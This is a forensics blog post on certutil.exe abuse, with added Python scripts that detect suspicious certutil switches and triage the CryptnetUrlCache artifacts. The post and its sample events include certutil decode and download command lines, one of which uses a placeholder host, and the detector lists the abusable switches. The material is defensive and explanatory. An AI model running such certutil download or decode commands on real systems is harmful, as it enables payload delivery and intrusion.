Wednesday, 13 March 2019

[Initial Access & Execution] - Evidence of file downloads using the Certutil.exe utility

Certutil is a Microsoft native utility that can be used to dump and display certification authority (CA) configuration information, configure certificate services, back up and restore CA components, and verify certificates, key pairs or certificate chains.

It comes with several command options, some of which can be (ab)used to decode a base64/hex-encoded malicious file and/or to download a payload/script:

  • Decoding example: certutil -decode %TEMP%\Signature.crt %TEMP%\Sign.exe
  • Download example: certutil -urlcache -split -f %APPDATA%\Softupdate.txt
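The two command forms above are what a process-creation detection would key on. The following is an added example (not code from the post): it scans constructed process-creation records shaped like Sysmon Event ID 1 fields (Image, CommandLine, OriginalFileName) for the -urlcache and -decode switches the post names, plus the closely related -decodehex and -encode, and uses the binary's OriginalFileName to keep matching when certutil.exe has been renamed. The sample events, the placeholder URL and the user paths are all constructed for this example.

```python
import re
from pathlib import PureWindowsPath

# certutil switches the post singles out as abusable (-decode, -urlcache), plus the
# closely related -decodehex and -encode. certutil documents options with a leading
# "-"; a leading "/" is accepted here as well for robustness.
SUSPICIOUS_SWITCHES = ("urlcache", "decodehex", "decode", "encode")
SWITCH_RE = re.compile(
    r"(?<![\w-])[-/](" + "|".join(SUSPICIOUS_SWITCHES) + r")\b", re.IGNORECASE
)
URL_RE = re.compile(r"\bhttps?://\S+", re.IGNORECASE)

# Constructed sample events (not from the post). Field names mirror Sysmon
# Event ID 1; the values are made up and the URL is a placeholder because the
# post does not give one.
SAMPLE_EVENTS = [
    {   # stock binary, download switch
        "Image": r"C:\Windows\System32\certutil.exe",
        "CommandLine": r"certutil -urlcache -split -f http://placeholder.invalid/Softupdate.txt %APPDATA%\Softupdate.txt",
        "OriginalFileName": "CertUtil.exe",
    },
    {   # renamed copy run from %TEMP%, decode switch
        "Image": r"C:\Users\username\AppData\Local\Temp\cu.exe",
        "CommandLine": r"cu.exe -decode %TEMP%\Signature.crt %TEMP%\Sign.exe",
        "OriginalFileName": "CertUtil.exe",
    },
    {   # legitimate certutil use, no flagged switch
        "Image": r"C:\Windows\System32\certutil.exe",
        "CommandLine": r"certutil -verify C:\certs\server.cer",
        "OriginalFileName": "CertUtil.exe",
    },
    {   # unrelated process
        "Image": r"C:\Windows\System32\notepad.exe",
        "CommandLine": r"notepad.exe notes.txt",
        "OriginalFileName": "NOTEPAD.EXE",
    },
]


def is_certutil(event: dict) -> bool:
    """True if the image is certutil.exe or a renamed copy (by OriginalFileName)."""
    image_name = PureWindowsPath(event.get("Image", "")).name.lower()
    original = event.get("OriginalFileName", "").lower()
    return image_name == "certutil.exe" or original == "certutil.exe"


def analyze_event(event: dict):
    """Return a finding dict for a suspicious certutil invocation, else None."""
    if not is_certutil(event):
        return None
    cmd = event.get("CommandLine", "")
    switches = sorted({m.group(1).lower() for m in SWITCH_RE.finditer(cmd)})
    if not switches:
        return None
    image_name = PureWindowsPath(event.get("Image", "")).name.lower()
    return {
        "switches": switches,                 # which abusable options were used
        "urls": URL_RE.findall(cmd),          # remote sources named on the command line
        "renamed": image_name != "certutil.exe",
    }


def scan(events: list) -> list:
    """Return (event, finding) pairs for every event that triggers a finding."""
    return [(e, f) for e in events if (f := analyze_event(e)) is not None]


if __name__ == "__main__":
    for event, finding in scan(SAMPLE_EVENTS):
        print(event["CommandLine"], "->", finding)
```

Command-line matching is the cheap first layer; the file-system artifacts the post goes on to describe are what remain when the binary is renamed or the command line is not logged.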
To investigate potential behavioral indicators for detecting the download operation, we download a file from the internet and monitor file and registry changes using procmon.exe:

As can be seen below, there are no relevant registry changes:

Surprisingly, the FileWrite operations reveal good forensic artifacts:

As can be seen above, we have multiple write operations:
  1. The location specified in the certutil.exe command as the destination for the downloaded file.
  2. C:\Users\username\AppData\Local\Microsoft\Windows\INetCache\IE\<Random>\
  3. C:\Users\username\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\random_file_name
  4. C:\Users\username\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\random_file_name
Verifying the content of the files written in 2 and 4 reveals that they are just copies of the downloaded file (stored in 1) --> good for IR and forensics (a copy of the dropped file 👍):

The last useful artifact observed is the download URL that was used (found in file #3, "CryptnetUrlCache\MetaData"):

  • The same tests conducted on Windows 10 were replicated on Windows 7: the same artifacts appear, except for the copy written to the INetCache folder (see bullet #2).
  • Renaming certutil.exe and running it from %temp% left the same artifacts.
  • Microsoft\CryptnetUrlCache\Content & MetaData are not heavily churned folders; see the creation times below on one machine that keeps content from 2017 until the present (which is good for forensics and for hunting previous infections using this technique):
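The three observations that matter for hunting are that Content holds a copy of the dropped file, MetaData holds the URL, and both directories keep old entries. The following is an added example (not the post's own code, and not a Microsoft parser) that turns those observations into a triage script: it pairs each MetaData entry with its Content copy by file name, hashes and sizes the copy, records the creation time for timelining, and pulls the URL out of the MetaData file. Because the post does not document the MetaData layout, the URL is recovered heuristically by scanning the raw bytes for a UTF-16LE "http(s)://" string rather than by parsing fixed offsets; that is an assumption of this example. The fixture it runs on (file names, payload bytes, the placeholder URL) is constructed inline so the script runs offline; point hunt() at a real CryptnetUrlCache directory to use it on a host.

```python
import hashlib
import re
import tempfile
from datetime import datetime, timezone
from pathlib import Path

# "http://" or "https://" in UTF-16LE, followed by printable ASCII code units.
# Searching the raw bytes makes the match independent of where the string sits,
# so the surrounding binary fields (not documented in the post) do not matter.
URL_UTF16_RE = re.compile(
    rb"h\x00t\x00t\x00p\x00(?:s\x00)?:\x00/\x00/\x00(?:[\x21-\x7e]\x00)+"
)


def extract_url(metadata_bytes: bytes):
    """Return the first UTF-16LE URL found in a MetaData file, or None."""
    m = URL_UTF16_RE.search(metadata_bytes)
    return m.group(0).decode("utf-16-le") if m else None


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def hunt(cache_root) -> list:
    """Pair each MetaData entry with its Content copy and summarise both."""
    root = Path(cache_root)
    content_dir, meta_dir = root / "Content", root / "MetaData"
    results = []
    for meta_path in sorted(meta_dir.iterdir()):
        if not meta_path.is_file():
            continue
        content_path = content_dir / meta_path.name
        has_content = content_path.is_file()
        # st_ctime is the creation time on Windows (the value the post uses for
        # timelining); on other platforms it is the inode change time.
        created = datetime.fromtimestamp(meta_path.stat().st_ctime, tz=timezone.utc)
        results.append({
            "name": meta_path.name,
            "url": extract_url(meta_path.read_bytes()),
            "created_utc": created.isoformat(),
            "content_present": has_content,
            "size": content_path.stat().st_size if has_content else None,
            "sha256": sha256_file(content_path) if has_content else None,
        })
    return results


def build_sample_cache(root) -> tuple:
    """Constructed fixture, not real cache data: two MetaData entries, one with a
    matching Content copy and one without."""
    content_dir, meta_dir = Path(root) / "Content", Path(root) / "MetaData"
    content_dir.mkdir()
    meta_dir.mkdir()
    payload = b"MZ" + b"\x90" * 62                      # stand-in for a dropped file
    url = "http://placeholder.invalid/Softupdate.txt"   # placeholder, not from the post
    # Assumption: the URL sits as a UTF-16LE string among binary fields; the
    # odd-length prefix shows the scanner does not depend on alignment.
    blob = b"\x02\x00\x00\x00" + b"\xaa" * 7 + url.encode("utf-16-le") + b"\x00\x00"
    (content_dir / "0000AAAA").write_bytes(payload)
    (meta_dir / "0000AAAA").write_bytes(blob)
    # Entry with neither a URL nor a Content copy, to exercise the missing-file path.
    (meta_dir / "FFFF0000").write_bytes(b"\x02\x00\x00\x00" + b"\x00" * 16)
    return url, hashlib.sha256(payload).hexdigest()


def demo():
    """Build the constructed cache in a temp dir and run hunt() over it."""
    with tempfile.TemporaryDirectory() as tmp:
        url, digest = build_sample_cache(tmp)
        return hunt(tmp), url, digest


if __name__ == "__main__":
    for entry in demo()[0]:
        print(entry)
```

The hash and URL per entry are what you would feed into a wider hunt (compare hashes across hosts, match URLs against known bad infrastructure); the creation time gives the first-seen date the post highlights for finding old infections.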

